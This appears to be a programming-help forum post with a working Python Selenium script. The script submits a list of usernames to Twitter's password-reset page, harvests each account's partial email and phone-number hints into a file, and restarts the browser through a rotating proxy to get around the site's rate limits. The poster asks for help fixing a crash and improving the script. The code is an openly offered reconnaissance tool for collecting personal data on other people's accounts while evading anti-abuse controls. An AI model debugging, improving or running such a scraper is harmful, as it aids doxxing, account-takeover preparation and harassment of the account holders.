I'm trying to make a scraper to scrape the email/number hints from twitter and it works perfectly, the issue is, once it hits the rate limit in my code and restarts the browser with a new session (i have a single rotating proxy that changes ips every session) it finishes the one it was rate limited on perfectly fine, then closes with this error before trying the next:
An error occurred: HTTPConnectionPool(host='localhost', port=59114): Max retries exceeded with url: /session/11f54991611f7a72a4dd938f34b2854a/url (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x00000225B9F61930>: Failed to establish a new connection: [WinError 10061] No connection could be made because the target machine actively refused it'))
Any clues as to why this happens? or how I can make it better?
I tried this:
import re
import threading
import argparse
from seleniumwire import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
import time
from config import proxy
def create_proxy_options():
return {
'proxy': {
'http': proxy,
'https': proxy,
'no_proxy': 'localhost,127.0.0.1'
}
}
def main():
parser = argparse.ArgumentParser(description="Twitter Password Reset Script")
parser.add_argument('--threads', type=int, default=1, help="Number of threads to run")
args = parser.parse_args()
with open('usernames.txt', 'r') as file:
usernames = file.readlines()
threads = []
for i in range(args.threads):
usernames_per_thread = usernames[i::args.threads]
thread = threading.Thread(target=process_usernames, args=(usernames_per_thread,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
def process_usernames(usernames):
proxy_options = create_proxy_options()
driver = webdriver.Chrome(seleniumwire_options=proxy_options)
try:
for username in usernames:
username = username.strip()
if not reset_password(driver, username, proxy_options):
continue # Continue to the next username if it was successful
except Exception as e:
print(f"An error occurred: {e}")
finally:
driver.quit()
def reset_password(driver, username, proxy_options):
while True:
driver.get("https://twitter.com/account/begin_password_reset")
auth_token_element = driver.find_element(By.NAME, 'authenticity_token')
auth_token = auth_token_element.get_attribute('value')
driver.execute_script(f"arguments[0].value = '{auth_token}';", auth_token_element)
account_identifier_input = driver.find_element(By.NAME, 'account_identifier')
account_identifier_input.send_keys(username)
submit_button = driver.find_element(By.XPATH, "//input[@type='submit']")
submit_button.click()
if "Enter your email address to continue" in driver.page_source:
print("Verification needed for username", username)
return False
elif "You've exceeded the number of attempts" in driver.page_source:
print("Rate limit exceeded. Retrying for username", username)
driver.quit()
time.sleep(2)
proxy_options = create_proxy_options()
driver = webdriver.Chrome(seleniumwire_options=proxy_options)
else:
email_hint, number_hint = extract_email_and_number_hints(driver.page_source)
hint_text = f"{username}:{email_hint or ''}:{number_hint or ''}"
print(hint_text)
with open('output.txt', 'a') as output_file:
output_file.write(hint_text + '\n')
return True
def extract_email_and_number_hints(page_source):
email_hint = re.search(r'Send an email to <strong dir="ltr">(.*?)<\/strong>', page_source)
number_hint = re.search(r'Text a code to the phone number ending in <strong dir="ltr">(.*?)<\/strong>', page_source)
email_hint_text = email_hint.group(1) if email_hint else None
number_hint_text = number_hint.group(1) if number_hint else None
return email_hint_text, number_hint_text
if __name__ == "__main__":
main()
i was expecting it to close the browser, open it with a new session (to get a different ip) and continue after the one it failed on.